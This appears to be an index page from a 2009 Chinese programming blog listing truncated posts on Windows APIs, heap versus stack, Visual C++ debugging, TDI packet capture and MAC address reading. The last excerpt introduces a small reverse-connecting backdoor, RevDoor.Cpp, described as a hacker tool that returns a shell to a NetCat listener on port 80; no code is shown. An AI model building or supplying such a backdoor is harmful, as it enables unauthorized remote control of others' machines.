孤独剑客 - 编程技巧

利用未公布API获取CPU使用率

janker007@qq.com (孤独剑客) — Sat, 29 Aug 2009 15:35:43 +0800

利用ntdll.dll中没有公开的API函数: NtQuerySystemInformation

typedef LONG (WINAPI *PROCNTQSI)(UINT,PVOID,ULONG,PULONG);
PROCNTQSI NtQuerySystemInformation;

NtQuerySystemInformation = (PROCNTQSI)GetProcAddress(
...

堆和栈的区别

janker007@qq.com (孤独剑客) — Sat, 29 Aug 2009 15:35:08 +0800

在bbs上，堆与栈的区分问题，似乎是一个永恒的话题，由此可见，初学者对此往往是混淆不清的，所以我决定拿他第一个开刀。
    首先，我们举一个例子：
    void f() { int* p=new int[5]; }
    这条短短的一句话就包含了堆与栈，看到new，我们首先就应该想到，我们分配了一块堆内存，那么指针p呢？他分配的是一块栈内存，所以这句话的意思就是：在栈内存中存放了一个指向一块堆内存的指针p。在程序会先确定在堆中分配内存的大小，然后调用operator new分配内存，然后返回这块内存的首地址，放入栈中，他在VC6下的汇编代码如下：
...

Visual C++开发工具与调试技巧整理方法

janker007@qq.com (孤独剑客) — Sat, 29 Aug 2009 15:34:19 +0800

　　自己总是用VC平台来开发东西，但是有时候总是出这样那样的问题，在这里把Visual C++开发工具与调试技巧整理摘录如下，希望对大家有用，省去大家再去搜索的烦恼。

　　1.如何在Release状态下进行调试

　　Project->Setting=>ProjectSetting对话框，选择Release状态。C/C++标签中的Category选General，Optimizations选Disable(Debug)，Debut info选Program Database。在Link标签中选中Generate debug info复选框。

...

TDI网络抓包功能

janker007@qq.com (孤独剑客) — Sat, 29 Aug 2009 15:33:11 +0800

#define MY_PORT 7609

HANDLE hTdiTransport = NULL; // handle to tdi transport
PFILE_OBJECT pTdiTransportObject = NULL; // pointer to tdi transport object

...

如何用VC++开发读取网卡MAC地址的程序

janker007@qq.com (孤独剑客) — Sat, 29 Aug 2009 15:32:26 +0800

在实际的应用系统中，我们往往会需要在程序运行时获取当前机器的网卡的MAC地址，以便作为某种标识之用，如控制程序的合法性等。下文就如何用Microsoft Visual C++ 6.0开发这样的程序演示如何实现其要点。

---- 这里采用的方法是通过Windows 9x/NT/Win2000中内置的NetApi32.DLL的功能来实现的，首先通过发送NCBENUM命令获取网卡的数目和每个网卡的内部编号，然后对每个网卡标号发送NCBASTAT命令获取其MAC地址。注意：这里的网卡是指捆绑了NetBeui协议的通信协议栈，可以在网卡的属性处查看到。

...

反向连接零管道后门RevDoor.Cpp

janker007@qq.com (孤独剑客) — Sat, 29 Aug 2009 15:30:26 +0800

/*
1k(程序体积1kb) 反向连接,零管道后门 By Anskya

说明:
不用我多说了吧..黑客一般都会使用的后门程序..
这里只是简单的演示一下..没有添加进程隐藏功能
程序可以在Win9x,Win2k,WinXP,Win2k3上使用
程序体积只有1k(FSG压缩一下会更小)

测试:
本地开启NetCat等工具,监听80端口,会返回一个Shell
...